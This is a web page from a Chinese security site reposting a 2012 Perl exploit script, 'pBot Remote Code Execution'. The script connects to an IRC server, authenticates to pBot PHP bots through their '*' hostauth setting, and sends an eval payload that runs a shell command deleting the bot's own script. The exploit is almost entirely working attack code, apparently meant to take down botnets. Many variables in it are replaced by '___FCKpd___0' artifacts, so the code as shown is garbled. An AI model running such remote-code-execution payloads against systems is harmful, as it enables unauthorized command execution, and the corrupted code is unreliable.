首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
pBot Remote Code Execution
来源:@bwallHatesTwits 作者:bwall 发布时间:2012-08-01   
#!/usr/bin/perl
# Exploit Title: pBot Remote Code Execution ("*" hostauth)
# Date: 31.07.2012
# Exploit Author: @bwallHatesTwits
# Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack)
# Version: Various versions
# Tested on: Linux 3.2

use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;

my $nickname = "BotSlayer";
my $ident = "BotSlayer";
my $fullname = "BotSlayer";
$sel_client = IO::Select->new();

#configuration values from the bot source
$ircserver = "localhost";					#"server"
$ircserverpass = "";						#"pass"
my $ircport = "6667"; 						#"port"
#if "key" is set, then add a space and the password to the chan name
my @channels = ("#anonbxu"); 				#"chan" and "chan2"
$botPass = "hello";							#"password"
$botTrigger = ".";							#"trigger"
#hostauth must be "*"
$loginCMD = "user";							#usually user or login

#payload - PHP code to run
#This version deletes the bots originating script, and dies
$phpEval = "shell_exec(\"rm -f \".\
___FCKpd___0

SERVER['SCRIPT_NAME']);exit();";

$channelCount = scalar(@channels);

sub onJoin
{
	my $channel = shift;
	$channel = substr($channel, 1);
	print "Joined $channel\n";
	say($channel, $botTrigger.$loginCMD." $botPass");
	sleep(1);
	say($channel, $botTrigger."eval \@BallastSec ".$phpEval);
	print "Payload delivered\n";
	tryQuit();
}

sub tryQuit
{
	$channelCount--;
	if($channelCount == 0)
	{
		quit("whomp wha");
	}
}

sub sendraw 
{
    if ($#_ == '1') 
    {
		my $socket = 
___FCKpd___0

[0];
		print $socket "
___FCKpd___0

[1]\n";
    } 
    else 
    {
        print $IRC_cur_socket "
___FCKpd___0

[0]\n";
    }
}

sub conn
{
    my $mynick = 
___FCKpd___0

[0];
    my $ircserver_con = 
___FCKpd___0

[1];
    my $ircport_con = 
___FCKpd___0

[2];
    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
    if (defined($IRC_socket)) 
    {
        $IRC_cur_socket = $IRC_socket;
        $IRC_socket->autoflush(1);
        $sel_client->add($IRC_socket);
        $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
        $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
        if($ircserverpass != "")
        {
			sendraw("PASS ".$ircserverpass);
		}
        sendraw("NICK ".$mynick);
        sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
        sleep 1;
    }
}

sub parse 
{
    my $servarg = shift;
    print $servarg."\n";
    if ($servarg =~ /^PING \:(.*)/) 
    {
        sendraw("PONG :$1");
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) JOIN (.+)/)
    {
		my $channel = $4;
		onJoin($channel);
	}
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) 
    {
        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
        if ($args =~ /^\001VERSION\001$/) 
        {
            notice("$pn", "\001VERSION BotSlayer by Ballast Security\001");
        }
        if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) 
        {
            my $natrix = $1;
            my $arg = $2;
        }
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) 
    {
        if (lc($1) eq lc($mynick)) 
        {
            $mynick=$4;
            $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        }
    } 
    elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) 
    {
        $mynick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        foreach(@channels)
        {
			sendraw("JOIN 
___FCKpd___0

");
		}        
    }
}
my $line_temp;
while(1) 
{
    while (!(keys(%irc_servers))) 
    { 
		conn($nickname, $ircserver, $ircport); 
	}
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_client->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) 
    {
        $IRC_cur_socket = $fh;
        $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
        $nread = sysread($fh, $msg, 4096);
        if ($nread == 0) {
            $sel_client->remove($fh);
            $fh->close;
            delete($irc_servers{$fh});
        }
        @lines = split (/\n/, $msg);
        $msg =~ s/\r\n$//;
        for(my $c=0; $c<= $#lines; $c++) 
        {
            $line = $lines[$c];
            $line=$line_temp.$line if ($line_temp);
            $line_temp='';
            $line =~ s/\r$//;
            parse("$line");
        }
    }
}

sub say
{
	return unless $#_ == 1;
    sendraw("PRIVMSG 
___FCKpd___0

[0] :
___FCKpd___0

[1]");
}

sub notice 
{
    return unless $#_ == 1;
    sendraw("NOTICE 
___FCKpd___0

[0] :
___FCKpd___0

[1]");
}

sub join 
{
	sendraw("JOIN 
___FCKpd___0

[0]");
}

sub part 
{
	sendraw("PART 
___FCKpd___0

[0]");
}

sub quit 
{
	sendraw("QUIT :
___FCKpd___0

[0]");
	exit;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SC DHCP 4.1.2 Denial Of Servic
·WebPageTest Arbitrary PHP File
·Microsoft Office SharePoint Se
·Microsoft Internet Explorer Fi
·AxMan ActiveX fuzzing <== Memo
·Psexec Via Current User Token
·Symantec Web Gateway 5.0.3.18
·httpdx 1.5.5 Denial of Service
·Sysax Multi-Server 5.64 Create
·Nvidia Linux Driver Privilege
·httpdx <= 1.5.4 Remote Heap Ov
·Dell SonicWALL Scrutinizer 9 S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved